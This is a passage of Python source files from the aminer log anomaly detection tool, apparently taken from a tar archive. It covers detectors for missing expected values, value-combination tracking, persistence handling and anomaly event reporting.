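                        if old_pair[1] in self.time_matrix and value in self.time_matrix[old_pair[1]]:
                            key_2_1 = old_pair[1]
                            key_2_2 = value
                        else:
                            key_2_1 = value
                            key_2_2 = old_pair[1]

                        if key_2_1 not in self.time_matrix:
                            self.time_matrix[key_2_1] = {}

                        if (key_2_2 not in self.time_matrix[key_2_1] or
                                self.time_matrix[key_1_1][key_1_2] + self.time_matrix[old_pair[0]][old_pair[1]] <
                                self.time_matrix[key_2_1][key_2_2]):
                            self.time_matrix[key_2_1][key_2_2] = self.time_matrix[key_1_1][key_1_2] +\
                                self.time_matrix[old_pair[0]][old_pair[1]]
                            if [key_2_1, key_2_2] not in new_pairs:
                                new_pairs += [[key_2_1, key_2_2]]

                    # Check old_pair[0] - old_pair[1] - value > value - old_pair[0]
                    if (old_pair[1] in self.time_matrix and value in self.time_matrix[old_pair[1]]) or (
                            value in self.time_matrix and old_pair[1] in self.time_matrix[value]):
                        if old_pair[1] in self.time_matrix and value in self.time_matrix[old_pair[1]]:
                            key_1_1 = old_pair[1]
                            key_1_2 = value
                        else:
                            key_1_1 = value
                            key_1_2 = old_pair[1]

                        if old_pair[0] in self.time_matrix and value in self.time_matrix[old_pair[0]]:
                            key_2_1 = old_pair[0]
                            key_2_2 = value
                        else:
                            key_2_1 = value
                            key_2_2 = old_pair[0]

                        if key_2_1 not in self.time_matrix:
                            self.time_matrix[key_2_1] = {}

                        if (key_2_2 not in self.time_matrix[key_2_1] or
                                self.time_matrix[key_1_1][key_1_2] + self.time_matrix[old_pair[0]][old_pair[1]] <
                                self.time_matrix[key_2_1][key_2_2]):
                            self.time_matrix[key_2_1][key_2_2] = self.time_matrix[key_1_1][key_1_2] +\
                                self.time_matrix[old_pair[0]][old_pair[1]]
                            if [key_2_1, key_2_2] not in new_pairs:
                                new_pairs += [[key_2_1, key_2_2]]
            old_pairs = new_pairs

    def do_timer(self, trigger_time):
        """
        Check if current ruleset should be persisted.

        @param trigger_time the time the timer fired.
        @return the delay in seconds until the next call.
        """
        persistence_period = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        if self.next_persist_time is None:
            return persistence_period
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = persistence_period
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage as [matrix rows, row keys, column keys per row] (see __init__)."""
        row_keys = list(self.time_matrix.keys())
        column_keys = [list(self.time_matrix[row_key].keys()) for row_key in row_keys]
        return_matrix = [[self.time_matrix[row_key][column_key] for column_key in column_keys[i]] for i, row_key in enumerate(row_keys)]
        PersistenceUtil.store_json(self.persistence_file_name, [return_matrix, row_keys, column_keys])
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    @staticmethod
    def _raise_error(msg):
        """Log msg to the debug log and raise it as Exception (shared failure path of the remote-control entry points)."""
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)

    def _assert_own_event(self, event_type):
        """Raise Exception unless event_type names this detector."""
        if event_type != f'Analysis.{self.__class__.__name__}':
            self._raise_error('Event not from this source')

    def _is_state_list(self, item):
        """True if item is a list of str with one entry per path of target_path_list (the state format used by remote control)."""
        return isinstance(item, list) and len(item) == len(self.target_path_list) and all(isinstance(value, str) for value in item)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """
        Allowlist an event generated by this source using the information emitted when generating the event.

        event_data is a parser path and is recorded in constraint_list. receive_atom() does not consult that list, so this
        currently has no effect on the analysis.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        self._assert_own_event(event_type)
        if allowlisting_data is not None:
            self._raise_error('Allowlisting data not understood by this detector')
        if event_data not in self.constraint_list:
            self.constraint_list.append(event_data)
        return f'Allowlisted path {event_data}.'

    def print_persistence_event(self, event_type, event_data):
        """
        Prints the persistence of component_name. Event_data specifies what information is output.

        Supported event_data: [] lists all known states, [state] lists the states that have a transition time with state, and
        [state_1, state_2] prints that transition time; a state is a list of strings with the same length as target_path_list.
        The state lists inside event_data are converted to tuples in place.
        @return a message with information about the persistence.
        @throws Exception when the output for the event_data was not possible.
        """
        self._assert_own_event(event_type)
        # Query if event_data has one of the stated formats
        if not (isinstance(event_data, list) and len(event_data) <= 2 and all(self._is_state_list(item) for item in event_data)):
            self._raise_error(
                'Event_data has the wrong format. The supported formats are [], [path_value_list] and '
                '[path_value_list_1, path_value_list_2], where the path value lists are lists of strings with the same length as '
                'the defined paths in the config.')
        # Convert path value lists to tuples
        for i, item in enumerate(event_data):
            event_data[i] = tuple(item)

        if len(event_data) == 0:
            # All states appearing as row or column key. Sorting assumes the state tuples are mutually comparable.
            states = set(self.time_matrix.keys())
            for row in self.time_matrix.values():
                states.update(row.keys())
            return f'Persistence includes transition times to the following path values: {sorted(states)}'

        if len(event_data) == 1:
            # States connected to the given one in either orientation.
            state = event_data[0]
            neighbours = set(self.time_matrix.get(state, {}).keys())
            neighbours.update(row_key for row_key, row in self.time_matrix.items() if state in row)
            if len(neighbours) > 0:
                return f'Persistence includes transition times from {state} to the following path values: {sorted(neighbours)}'
            return f'Persistence includes no transition time from {state}.'

        entry = self._find_entry(event_data[0], event_data[1])
        if entry is None:
            return f'No transition time for {list(event_data[0])} - {list(event_data[1])}.'
        return f'Transition time {list(event_data[0])} - {list(event_data[1])}: {self.time_matrix[entry[0]][entry[1]]}.'

    def add_to_persistence_event(self, event_type, event_data):
        """
        Add or overwrite the information of event_data to the persistence of component_name.

        event_data is [state_1, state_2, new_transition_time]; the state lists are converted to tuples in place. The time is
        only type-checked (int or float), not range-checked, so callers must be trusted.
        @return a message with information about the addition to the persistence.
        @throws Exception when the addition of this special event using given event_data was not possible.
        """
        self._assert_own_event(event_type)
        # Query if event_data has the stated format
        if not (isinstance(event_data, list) and len(event_data) == 3 and self._is_state_list(event_data[0]) and
                self._is_state_list(event_data[1]) and isinstance(event_data[2], (int, float))):
            self._raise_error(
                'Event_data has the wrong format. The supported format is [path_value_list_1, path_value_list_2, new_transition_time], '
                'where the path value lists are lists of strings with the same length as the defined paths in the config.')
        # Convert path value lists to tuples
        event_data[0] = tuple(event_data[0])
        event_data[1] = tuple(event_data[1])
        new_time = float(event_data[2])

        entry = self._find_entry(event_data[0], event_data[1])
        if entry is None:
            # Initialize the entry in the time matrix
            self.time_matrix.setdefault(event_data[0], {})[event_data[1]] = new_time
            return f'Added transition time: {list(event_data[0])} - {list(event_data[1])}, {new_time}'
        old_transition_time = self.time_matrix[entry[0]][entry[1]]
        self.time_matrix[entry[0]][entry[1]] = new_time
        return f'Changed transition time {list(event_data[0])} - {list(event_data[1])} from {old_transition_time} to {new_time}'

    def remove_from_persistence_event(self, event_type, event_data):
        """
        Removes the information of event_data from the persistence of component_name.

        event_data is [state_1, state_2]; the state lists are converted to tuples in place. A row left empty by the removal is
        dropped from the matrix.
        @return a message with information about the removal from the persistence.
        @throws Exception when the removal of this special event using given event_data was not possible.
        """
        self._assert_own_event(event_type)
        # Query if event_data has the stated format (the list check avoids a TypeError on unsized input)
        if not (isinstance(event_data, list) and len(event_data) == 2 and self._is_state_list(event_data[0]) and
                self._is_state_list(event_data[1])):
            self._raise_error(
                'Event_data has the wrong format. The supported format is [path_value_list_1, path_value_list_2], '
                'where the path value lists are lists of strings with the same length as the defined paths in the config.')
        # Convert path value lists to tuples
        event_data[0] = tuple(event_data[0])
        event_data[1] = tuple(event_data[1])

        entry = self._find_entry(event_data[0], event_data[1])
        if entry is None:
            return f'Transition time for {list(event_data[0])} - {list(event_data[1])} does not exist and therefore could not be deleted.'
        row_key, column_key = entry
        deleted_time = self.time_matrix[row_key].pop(column_key)
        # Delete the entry to row_key if it is empty
        if self.time_matrix[row_key] == {}:
            self.time_matrix.pop(row_key)
        return f'Deleted transition time {list(event_data[0])} - {list(event_data[1])}: {deleted_time}.'

    def blocklist_event(self, event_type, event_data, blocklisting_data):
        """
        Blocklist an event generated by this source using the information emitted when generating the event.

        event_data is a parser path that is appended to ignore_list; log atoms containing it are skipped from then on.
        @return a message with information about blocklisting
        @throws Exception when blocklisting of this special event using given blocklisting_data was not possible.
        """
        self._assert_own_event(event_type)
        if blocklisting_data is not None:
            self._raise_error('Blocklisting data not understood by this detector')
        if event_data not in self.ignore_list:
            self.ignore_list.append(event_data)
        return f'Blocklisted path {event_data}.'

    @staticmethod
    def _format_paths(paths):
        """Render paths one per line, indented by one space except for the first one."""
        rendered = ''
        for path in paths:
            rendered += ' ' + path + os.linesep
        return rendered.lstrip(' ')

    def print(self, message, log_atom, affected_path, confidence=None, additional_information=None):
        """
        Send message as an anomaly event to all anomaly_event_handlers.

        @param message human readable description of the anomaly.
        @param log_atom the log atom that triggered the event; its raw_data is included in the output lines.
        @param affected_path a path or list of paths reported as AffectedLogAtomPaths when output_logline is False.
        @param confidence optional confidence, reported as TypeInfo.Confidence.
        @param additional_information optional dict merged into the AnalysisComponent part of the event data.
        """
        if isinstance(affected_path, str):
            affected_path = [affected_path]
        if additional_information is None:
            additional_information = {}
        original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
        if original_log_line_prefix is None:
            original_log_line_prefix = ''
        # raw_data is log input and may contain bytes that are not valid in the default encoding. The reporting path must not
        # raise on them; 'backslashreplace' keeps the offending bytes visible in the alert instead of dropping them.
        raw_line = log_atom.raw_data.decode(errors='backslashreplace')
        if self.output_logline:
            paths = list(log_atom.parser_match.get_match_dictionary().keys())
            sorted_log_lines = [self._format_paths(paths) + original_log_line_prefix + raw_line]
            analysis_component = {'AffectedLogAtomPaths': paths}
        else:
            sorted_log_lines = [self._format_paths(affected_path) + raw_line]
            analysis_component = {'AffectedLogAtomPaths': affected_path}
        analysis_component.update(additional_information)
        event_data = {'AnalysisComponent': analysis_component, 'TypeInfo': {}}
        if confidence is not None: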
event_data['TypeInfo']['Confidence'] = confidence for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self) MissingMatchPathValueDetector.py000066400000000000000000000504031437606560100372210ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module provides the MissingMatchPathValueDetector to generate events when expected values were not seen for an extended period of time. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class MissingMatchPathValueDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """ This class creates events when an expected value is not seen within a given timespan. For example because the service was deactivated or logging disabled unexpectedly. 
This is complementary to the function provided by NewMatchPathValueDetector.

For each unique value extracted by paths, a tracking record is added to expected_values_dict. It stores three numbers: the
timestamp the extracted value was last seen, the maximum allowed gap between observations and the next alerting time when
currently in error state. When in normal (alerting) state, the value is zero. A fourth element holds the parser path the value
was extracted from; it is used to filter persisted records against target_path_list.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id='Default', learn_mode=False,
                 default_interval=3600, realert_interval=86400, combine_values=True, output_logline=True, stop_learning_time=None,
                 stop_learning_no_anomaly_time=None):
        """
        Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths
        are considered for value range generation.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param persistence_id name of persistence file.
        @param learn_mode specifies whether new expected values should be learned.
        @param default_interval time in seconds before a value is reported missing. The parameter is applied to the parsed record
        data time, not the system time. Hence, reports can be delayed when no data is received. Persisted records are reset to
        this interval when it differs from the persisted one.
        @param realert_interval time in seconds before a value is reported missing for a second time. The parameter is applied to
        the parsed record data time, not the system time. Hence, reports can be delayed when no data is received.
        @param combine_values if true the combined values are used as identifiers. When false, individual values are checked.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5
        # NOTE(review): receive_atom() increments log_total; it is presumably reset to 0 by the base class __init__ — confirm.
        super().__init__(
            aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers,
            persistence_id=persistence_id, learn_mode=learn_mode, default_interval=default_interval, realert_interval=realert_interval,
            output_logline=output_logline, combine_values=combine_values, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time
        )
        # This timestamp is compared with timestamp values from log atoms for activation of alerting logic. The first timestamp from logs
        # above this value will trigger alerting.
        self.next_check_timestamp = 0
        self.last_seen_timestamp = 0
        self.log_learned_values = 0
        self.log_new_learned_values = []
        # Load persistence. The file content is trusted as-is: records are indexed without structural validation.
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        self.expected_values_dict = {}
        if persistence_data is not None:
            for key in persistence_data:
                value = persistence_data[key]
                # Only keep records whose path (value[3]) belongs to the configured paths: the individual path when
                # combine_values is False, the str() of the whole list when it is True.
                if self.target_path_list is not None:  # skipcq: PTC-W0048
                    if (value[3] not in self.target_path_list and not self.combine_values) or (
                            value[3] != str(self.target_path_list) and self.combine_values):
                        continue
                # NOTE(review): this branch repeats the condition of the preceding `if` and is therefore unreachable.
                elif self.target_path_list is not None and value[3] not in self.target_path_list:
                    continue
                # A changed default_interval overrides the persisted one and recomputes the next alerting time.
                if value[1] != default_interval:
                    value[1] = default_interval
                    value[2] = value[0] + default_interval
                self.expected_values_dict[key] = value
            logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)
        # Format string for the event type; not used within the visible part of this class.
        self.analysis_string = 'Analysis.%s'

    def receive_atom(self, log_atom):
        """
        Receive a log atom from a source.
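@param log_atom binary raw atom data
        @return True if this handler was really able to handle and process the atom. Depending on this information, the caller may
        decide if it makes sense passing the atom also to other handlers or to retry later. This behaviour has to be documented at each
        source implementation sending log atoms.
        """
        self.log_total += 1
        # Learning is switched off as soon as the configured stop time lies before the atom's own time.
        if self.learn_mode is True and self.stop_learning_timestamp is not None and \
                self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False
        value = self.get_channel_key(log_atom)
        # Nothing to track when no target path matched (None) or both the path and the value part are empty.
        if value is None or (not value[0] and not value[1]):
            return False
        target_paths, value_list = value
        # MissingMatchPathListValueDetector.get_channel_key returns a single (path, value) pair; normalise it to lists.
        if isinstance(target_paths, str) and isinstance(value_list, str):
            target_paths = [target_paths]
            value_list = [value_list]
        timestamp = log_atom.get_timestamp()
        if timestamp is None:
            timestamp = time.time()
        for i, target_path in enumerate(target_paths):
            value = value_list[i]
            detector_info = self.expected_values_dict.get(value)
            if detector_info is None and self.learn_mode:
                # Tracking record layout: [last seen timestamp, allowed gap, next realert time (0 = normal state), target path].
                self.expected_values_dict[value] = [timestamp, self.default_interval, 0, target_path]
                self.next_check_timestamp = min(self.next_check_timestamp, timestamp + self.default_interval)
                self.log_learned_values += 1
                self.log_new_learned_values.append(value)
                if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None:
                    self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time
        self.check_timeouts(timestamp, log_atom)
        for i, target_path in enumerate(target_paths):
            value = value_list[i]
            detector_info = self.expected_values_dict.get(value)
            if detector_info is not None:
                # Just update the last seen value and switch from non-reporting error state to normal state.
                detector_info[0] = timestamp
                if detector_info[2] != 0:
                    if timestamp >= detector_info[2]:
                        detector_info[2] = 0
                    # Delta of this detector might be lower than the default maximum recheck time.
                    self.next_check_timestamp = min(self.next_check_timestamp, timestamp + detector_info[1])
        self.log_success += 1
        return True

    def get_channel_key(self, log_atom):
        """
        Get the key identifying the channel this log_atom is coming from.

        @param log_atom the parsed log atom; only the match dictionary entries at target_path_list are read.
        @return None when combine_values is set and one of the target paths is missing, otherwise the tuple
        (path_list, value_list). With combine_values both parts are the str() of the collected lists, so one combined key
        is tracked; without it they are parallel lists holding one entry per matched value.
        """
        value_list = []
        path_list = []
        for target_path in self.target_path_list:
            match = log_atom.parser_match.get_match_dictionary().get(target_path)
            if match is None:
                if self.combine_values:
                    return None
                continue
            # A path may hold a single match element or a list of them (repeated elements).
            matches = match if isinstance(match, list) else [match]
            for match_element in matches:
                if isinstance(match_element.match_object, bytes):
                    # The bytes come straight from the parsed log input. An undecodable value must not abort the whole
                    # detector run, so fall back to repr() the same way check_timeouts does when rendering these values.
                    try:
                        affected_log_atom_values = match_element.match_object.decode(AminerConfig.ENCODING)
                    except UnicodeError:
                        affected_log_atom_values = repr(match_element.match_object)
                else:
                    affected_log_atom_values = match_element.match_object
                value_list.append(str(affected_log_atom_values))
                path_list.append(target_path)
        if self.combine_values:
            value_list = str(value_list)
            path_list = str(path_list)
        return path_list, value_list

    def check_timeouts(self, timestamp, log_atom):
        """
        Check if there was any timeout on a channel, thus triggering event dispatching.

        All time arithmetic is done on log data timestamps (last_seen_timestamp), never on the wall clock, so a silent
        channel is only reported once another atom carrying a later timestamp arrives.
        Side effects: updates last_seen_timestamp and next_check_timestamp, and for every reported value stores the next
        realert time in detector_info[2].
        @param timestamp the timestamp of the atom that triggered the check.
        @param log_atom the triggering atom; its match dictionary is only used to fill AffectedLogAtomPaths.
        @return always True.
        """
        old_last_seen_timestamp = self.last_seen_timestamp
        self.last_seen_timestamp = max(self.last_seen_timestamp, timestamp)
        if self.last_seen_timestamp > self.next_check_timestamp:
            missing_value_list = []
            # Start with a large recheck interval. It will be lowered if any of the expectation intervals is below that.
            if self.next_check_timestamp == 0:
                self.next_check_timestamp = self.last_seen_timestamp + self.realert_interval
            for value, detector_info in self.expected_values_dict.items():
                value_overdue_time = int(self.last_seen_timestamp - detector_info[0] - detector_info[1])
                if detector_info[2] != 0:
                    next_check_delta = detector_info[2] - self.last_seen_timestamp
                    if next_check_delta > 0:
                        # Already alerted but not ready for realerting yet.
                        self.next_check_timestamp = min(self.next_check_timestamp, detector_info[2])
                        continue
                else:
                    # No alerting yet, see if alerting is required.
                    if value_overdue_time < 0:
                        old = self.next_check_timestamp
                        self.next_check_timestamp = min(self.next_check_timestamp, self.last_seen_timestamp - value_overdue_time)
                        # NOTE(review): this break stops the scan over the remaining tracked values for this round; it looks
                        # deliberate ("avoid early re-alerting" below) but verify against the intended semantics.
                        if old > self.next_check_timestamp or self.next_check_timestamp < detector_info[2]:
                            break
                # avoid early re-alerting
                if value_overdue_time > 0:
                    missing_value_list.append([detector_info[3], value, value_overdue_time, detector_info[1]])
                    # Set the next alerting time.
                    detector_info[2] = self.last_seen_timestamp + self.realert_interval
                    self.expected_values_dict[value] = detector_info
                # Workaround:
                # also check for long gaps between same tokens where the last_seen_timestamp gets updated
                # on the arrival of tokens following a longer gap
                elif self.last_seen_timestamp - detector_info[0] > detector_info[1]:
                    value_overdue_time = self.last_seen_timestamp - old_last_seen_timestamp - detector_info[1]
                    missing_value_list.append([detector_info[3], value, value_overdue_time, detector_info[1]])
                    # Set the next alerting time.
                    detector_info[2] = self.last_seen_timestamp + self.realert_interval
                    self.expected_values_dict[value] = detector_info
            if missing_value_list:
                message_part = []
                affected_log_atom_values = []
                for target_path_list, value, overdue_time, interval in missing_value_list:
                    e = {}
                    # Render the tracked value for the message; undecodable bytes are shown via repr().
                    try:
                        if isinstance(value, list):
                            data = []
                            for val in value:
                                if isinstance(val, bytes):
                                    data.append(val.decode(AminerConfig.ENCODING))
                                else:
                                    data.append(val)
                            data = str(data)
                        else:
                            if isinstance(value, bytes):
                                data = value.decode(AminerConfig.ENCODING)
                            else:
                                data = repr(value)
                    except UnicodeError:
                        data = repr(value)
                    # Subclasses (MissingMatchPathListValueDetector) report the whole configured path list instead of the
                    # single path stored with the value.
                    if self.__class__.__name__ == 'MissingMatchPathValueDetector':
                        e['TargetPathList'] = target_path_list
                        message_part.append(f' {target_path_list}: {data} overdue {overdue_time}s (interval {interval})\n')
                    else:
                        target_paths = ''
                        for target_path in self.target_path_list:
                            target_paths += target_path + ', '
                        e['TargetPathList'] = self.target_path_list
                        message_part.append(f' {target_paths[:-2]}: {data} overdue {overdue_time}s (interval {interval})\n')
                    e['Value'] = str(value)
                    e['OverdueTime'] = str(overdue_time)
                    e['Interval'] = str(interval)
                    affected_log_atom_values.append(e)
                affected_log_atom_paths = []
                for path in log_atom.parser_match.get_match_dictionary().keys():
                    if path in self.target_path_list:
                        affected_log_atom_paths.append(path)
                analysis_component = {'AffectedLogAtomPaths': affected_log_atom_paths, 'AffectedLogAtomValues': affected_log_atom_values}
                event_data = {'AnalysisComponent': analysis_component}
                for listener in self.anomaly_event_handlers:
                    self.send_event_to_handlers(listener, event_data, log_atom, [''.join(message_part).strip()])
        return True

    def send_event_to_handlers(self, anomaly_event_handler, event_data, log_atom, message_part):
        """
        Send an event to the event handlers.

        @param anomaly_event_handler the handler receiving the event.
        @param event_data the dictionary with the AnalysisComponent built by check_timeouts.
        @param log_atom the atom that triggered the check.
        @param message_part list with the human readable description of all overdue values.
        """
        anomaly_event_handler.receive_event(self.analysis_string % self.__class__.__name__, 'Interval too large between values',
                                            message_part, event_data, log_atom, self)

    def set_check_value(self, value, interval,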
target_path): """Add or overwrite a value to be monitored by the detector.""" self.expected_values_dict[value] = [self.last_seen_timestamp, interval, 0, target_path] self.next_check_timestamp = 0 def remove_check_value(self, value): """Remove checks for given value.""" del self.expected_values_dict[value] logging.getLogger(DEBUG_LOG_NAME).debug("%s removed check value %s.", self.__class__.__name__, str(value)) def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, self.expected_values_dict) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting using given allowlisting_data was not possible. 
""" if event_type != self.analysis_string % self.__class__.__name__: msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(allowlisting_data, int): msg = 'Allowlisting data has to integer with new interval, -1 to reset to defaults, other negative value to remove the entry' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) new_interval = allowlisting_data if new_interval == -1: new_interval = self.default_interval if new_interval < 0: self.remove_check_value(event_data[0]) else: self.set_check_value(event_data[0], new_interval, event_data[1]) return f"Updated '{event_data[0]}' in '{event_data[1]}' to new interval {new_interval}." def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_values) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes. Following new values" " were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_values, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_values = 0 self.log_new_learned_values = [] class MissingMatchPathListValueDetector(MissingMatchPathValueDetector): """ This detector works similar to the MissingMatchPathValueDetector. It only can lookup values from a list of paths until one path really exists. It then uses this value as key to detect logAtoms belonging to the same data stream. This is useful when e.g. 
due to different log formats, the hostname, servicename or any other relevant channel identifier has alternative paths. """ def get_channel_key(self, log_atom): """Get the key identifying the channel this log_atom is coming from.""" for target_path in self.target_path_list: match_element = log_atom.parser_match.get_match_dictionary().get(target_path) if match_element is None: continue if isinstance(match_element.match_object, bytes): affected_log_atom_values = match_element.match_object.decode(AminerConfig.ENCODING) else: affected_log_atom_values = match_element.match_object return target_path, str(affected_log_atom_values) return None def send_event_to_handlers(self, anomaly_event_handler, event_data, log_atom, message_part): """Send an event to the event handlers.""" anomaly_event_handler.receive_event(self.analysis_string % self.__class__.__name__, 'Interval too large between values', message_part, event_data, log_atom, self) NewMatchIdValueComboDetector.py000066400000000000000000000327641437606560100367730ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This file defines the NewMatchIdValueComboDetector. detector to extract values from multiple LogAtoms and check, if the value combination was already seen before. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import time import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class NewMatchIdValueComboDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """ This class creates events when a new value combination for a given list of match data. Paths need to be found in log atoms with the same id value in a specific path. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, id_path_list, min_allowed_time_diff, persistence_id='Default', allow_missing_values_flag=False, learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list the list of values to extract from each match to create the value combination to be checked. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list the list of paths where id values can be stored in all relevant log event types. @param min_allowed_time_diff the minimum amount of time in seconds after the first appearance of a log atom with a specific id that is waited for other log atoms with the same id to occur. The maximum possible time to keep an incomplete combo is 2*min_allowed_time_diff @param persistence_id name of persistence file. 
@param allow_missing_values_flag when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object. @param learn_mode when set to True, this detector will report a new value only the first time before including it in the known values set automatically. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, id_path_list=id_path_list, min_allowed_time_diff=min_allowed_time_diff, persistence_id=persistence_id, allow_missing_values_flag=allow_missing_values_flag, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) self.known_values = [] if persistence_data is not None: # Combinations are stored as list of dictionaries for record in persistence_data: self.known_values.append(record) logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) PersistenceUtil.add_persistable_component(self) self.id_dict_current = {} self.id_dict_old = {} self.next_shift_time = None def receive_atom(self, log_atom): """ Receive on parsed atom and the information about the parser match. 
